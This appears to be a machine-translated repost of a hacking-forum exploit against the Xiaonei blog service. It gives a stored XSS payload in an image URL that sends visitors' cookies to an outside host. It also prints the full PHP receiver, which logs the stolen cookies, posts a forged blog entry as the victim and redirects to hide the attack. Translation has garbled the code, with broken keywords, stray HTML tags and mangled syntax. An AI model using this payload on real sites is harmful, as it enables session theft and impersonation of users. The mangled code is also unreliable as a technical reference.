From: t00ls.net
The internal network does not strictly filter the inserted images when posting blogs. The xss vulnerability exists.
When posting a blog, write the inserted image URL as the following code to trigger: normal browsing, copying, and printing code
Javascript: window. location. href = http://www.xxx.com/test. <SPAN class = t_tag xxxxx = tagshow (event) href = "tag. php? Name = php "> php </SPAN>? Cookie = + document. cookie
Javascript: window. location. href = http://www.xxx.com/test.php? Cookie = + document. cookie test. php is used to steal cookies, forge a reader identity, send a blog, and jump to a normal log. The Code is as follows:
<? Php
Ob_start ();
$ Url = blog.xiaonei.com;
$ Cookie = $ _ GET [cookie];
$ Cookie1 = $ cookie ."";
Fputs(fopen(a.txt, a +), $ cookie1); // cookie write a.txt
// Send a forged log, which can also insert malicious code
$ Sock = fsockopen ("$ url", 80, $ errno, $ errstr, 30 );
If (! $ Sock) die ("$ errstr ($ errno )");
$ Data = "title = test by fly & body = test by fly & categoryId = 0 & blogControl = 99 & passwordProtedted = 0 & passWord = & blog_pic_id = & pic_path = & activity
= & Id = & relative_optpe = ";
Fwrite ($ sock, "posthttp: // $ url/NewEntry. do http/1.1 ");
Fwrite ($ sock, "Accept :*/*");
Fwrite ($ sock, "Referer: http: // $ url ");
Fwrite ($ sock, "Accept-Language: zh-cn ");
Fwrite ($ sock, "Content-Type: application/x-www-form-urlencoded ");
Fwrite ($ sock, "Accept-Encoding: gzip, deflate ");
Fwrite ($ sock, "User-Agent: Mozilla ");
Fwrite ($ sock, "Host: $ url ");
Fwrite ($ sock, "Content-Length:". strlen ($ data )."");
Fwrite ($ sock, "Connection: Keep-Alive ");
Fwrite ($ sock, "Cache-Control: no-cache ");
Fwrite ($ sock, "Cookie:". $ cookie ."");
Fwrite ($ sock, $ data );
$ Headers = "";
While ($ str = trim (fgets ($ sock, 4096 )))
$ Headers. = "$ str ";
Echo "";
$ Body = "";
While (! Feof ($ sock ))
$ Body. = fgets ($ sock, 4096 );
Fclose ($ sock );
// Echo $ body;
// Jump to a normal log
Header ("Location: http://blog.xiaonei.com/GetEntry.do? Id = xxxx & owner = xxxxx ");
Ob_end_flush ();
?>